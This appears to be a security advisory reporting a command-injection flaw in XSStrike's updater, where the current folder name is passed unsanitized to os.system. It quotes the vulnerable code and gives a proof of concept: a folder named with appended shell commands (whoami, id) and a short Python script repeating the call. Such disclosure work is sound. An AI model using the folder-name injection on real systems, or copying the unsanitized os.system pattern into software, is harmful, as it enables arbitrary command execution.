Vulnerability - Executing commands with unsanitized folder name

[randsec]

Impact

What kind of vulnerability is it? Command execution over an unsanitized folder name.

Vulnerable file

XSStrike/core/updater.py

Vulnerable code

line 33,34: os.system('git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder)) The folder variable is taken from the current directory. lines 26,27:

currentPath = os.getcwd().split('/')
folder = currentPath[-1]

If the user creates a folder with a linux command on it, the command will be executed.

POC

Create folder with command injection on it: mkdir "command_injection;whoami;id"

Call os.system: os.system( 'git clone --quiet https://github.com/s0md3v/XSStrike %s' % (folder))

The system will clone the repo and then will execute commands: whoami; id

Below I wrote a POC. It's the same os.system call but modified to list the folder's contents instead of clone a repo. It won't affect exploitability.

import os

currentPath = os.getcwd().split('/')
folder = currentPath[-1]

print ("[i] Current folder name: {}".format(folder))
print ("[!] I'm going to call the os.system command!...")
os.system('ls %s' % (folder))